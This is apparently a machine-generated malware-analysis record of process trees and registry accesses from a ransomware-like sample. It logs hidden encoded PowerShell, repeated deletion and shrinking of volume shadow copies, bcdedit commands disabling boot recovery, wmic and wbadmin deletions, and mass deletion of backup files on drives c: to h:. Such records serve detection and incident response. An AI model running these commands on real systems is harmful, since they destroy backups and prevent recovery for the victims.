Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Process
117
4420
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
118
4992
vssadmin.exe
4420
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
119
3996
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
120
3420
vssadmin.exe
3996
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
121
3620
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
122
2920
vssadmin.exe
3620
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
123
5020
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
124
4636
vssadmin.exe
5020
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
125
4656
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
126
4660
vssadmin.exe
4656
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
127
904
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
128
4904
vssadmin.exe
904
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
129
3464
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
130
3456
vssadmin.exe
3464
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
131
5028
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
132
4884
vssadmin.exe
5028
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
133
4012
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
134
952
vssadmin.exe
4012
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
135
5000
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
136
5048
vssadmin.exe
5000
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
137
3664
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
138
3984
vssadmin.exe
3664
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
139
4052
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
140
4552
vssadmin.exe
4052
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
141
3872
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
142
1416
vssadmin.exe
3872
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
143
5080
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
144
3292
vssadmin.exe
5080
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
145
8
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
146
176
vssadmin.exe
8
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
147
4504
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
148
652
vssadmin.exe
4504
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
149
4664
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
150
360
vssadmin.exe
4664
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
151
4876
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
152
2540
vssadmin.exe
4876
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
153
4960
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
154
1308
vssadmin.exe
4960
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
155
2616
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
156
3436
vssadmin.exe
2616
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
157
1276
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
158
3592
vssadmin.exe
1276
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
159
4892
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
160
4424
vssadmin.exe
4892
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
161
3288
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
162
700
vssadmin.exe
3288
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
163
3316
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
164
1820
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
165
4796
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
166
1304
powershell.exe
4796
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Process
167
3848
forfiles.exe
1304
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin Delete Shadows /all /quiet"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Process
168
4588
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
169
1360
vssadmin.exe
4588
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
170
4804
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
171
4488
vssadmin.exe
4804
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
172
4944
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
173
1152
vssadmin.exe
4944
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
174
4448
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
175
1200
vssadmin.exe
4448
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
176
3352
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
177
1716
vssadmin.exe
3352
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
178
4992
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
179
4420
vssadmin.exe
4992
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
180
3716
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
181
2304
vssadmin.exe
3716
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
182
2592
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
183
3616
vssadmin.exe
2592
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
184
1448
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
185
4724
vssadmin.exe
1448
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
186
4676
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
187
3928
vssadmin.exe
4676
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
188
4888
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
189
3116
vssadmin.exe
4888
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
190
4824
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
191
4064
vssadmin.exe
4824
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
192
5104
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
193
5052
vssadmin.exe
5104
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
194
1740
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
195
4964
vssadmin.exe
1740
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
196
3748
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
197
1744
vssadmin.exe
3748
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
198
3880
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
199
4932
vssadmin.exe
3880
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
200
4624
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
201
4428
vssadmin.exe
4624
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
202
916
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
203
1848
vssadmin.exe
916
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
204
3412
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
205
4360
vssadmin.exe
3412
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
206
1784
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
207
1788
vssadmin.exe
1784
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
208
4024
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
209
4608
vssadmin.exe
4024
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
210
3452
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
211
1440
vssadmin.exe
3452
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
212
1948
cmd.exe
3848
cmd.exe
/c vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
213
3736
vssadmin.exe
1948
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
214
1852
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
215
4652
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
216
4468
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
217
668
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
218
4580
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC 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
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
219
3752
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
220
4084
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
221
3468
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
222
1340
vssadmin.exe
3468
vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
223
4568
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
224
3636
vssadmin.exe
4568
vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
225
2000
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
226
3544
vssadmin.exe
2000
vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
227
3324
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
228
1692
vssadmin.exe
3324
vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
229
3316
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
230
1820
vssadmin.exe
3316
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
231
3872
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
232
4936
vssadmin.exe
3872
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
233
3348
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
234
1360
vssadmin.exe
3348
vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
235
840
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
236
4488
vssadmin.exe
840
vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
237
4896
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
238
1088
vssadmin.exe
4896
vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
239
4956
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
240
3980
vssadmin.exe
4956
vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
241
5096
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
242
3372
vssadmin.exe
5096
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
243
4644
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
244
3628
vssadmin.exe
4644
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
245
872
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
246
2640
vssadmin.exe
872
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
247
4592
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
248
2676
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
249
2920
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
250
1252
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
251
4996
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
252
4636
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
253
4656
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c wmic shadowcopy delete
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
254
3536
wmic.exe
4656
wmic.exe
wmic shadowcopy delete
C:\
c:\windows\syswow64\wbem\wmic.exe
Opened
Process
258
3432
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c wbadmin delete catalog -quiet
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\AppContext
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\Transcription
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\Transcription
HKEY_CURRENT_USER
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_CURRENT_USER
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
